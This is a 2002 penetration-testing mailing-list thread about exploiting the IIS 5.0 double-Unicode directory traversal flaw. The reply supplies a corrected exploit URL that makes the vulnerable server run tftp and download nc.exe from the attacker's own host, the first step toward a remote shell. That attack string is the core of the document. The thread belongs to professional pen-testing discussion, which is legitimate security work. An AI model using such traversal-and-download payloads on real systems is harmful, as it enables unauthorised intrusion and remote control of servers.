Penetration Testing mailing list archives

RE: Can't get a shell

From: "Coral J. Cook" <cjcook () nosc mil>
Date: Thu, 11 Jul 2002 11:54:12 -0700

-----Original Message-----
From: Gaziel, Avishay [mailto:agaziel () kpmg com]
Sent: Tuesday, July 09, 2002 9:33 AM
To: PEN-TEST () securityfocus com
Subject: Can't get a shell

Hi All,
Situation:
An  IIS5.0 vulnerable to unicode.("double Unicode" i.e. ..%255c.. etc.)
IIS sitting behind a firewall.
Problem:
host/scripts/..%255c.........../winnt/system32/cmd.exe?/tftp+-i+my
server+get+nc.exe doesn't work


Here is the correct format:

host/scripts/..%255c.........../winnt/system32/tftp?+"-i"+myserver+GET+nc.ex
e

notice that cmd.exe is removed and that -i is quoted "-i"
that should fix your problem

R,
Coral



----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Current thread:

Can't get a shell Gaziel, Avishay (Jul 11)
- RE: Can't get a shell Coral J. Cook (Jul 11)
- <Possible follow-ups>
- RE: Can't get a shell Rico Valdez (Jul 11)
- RE: Can't get a shell Jeremy Junginger (Jul 11)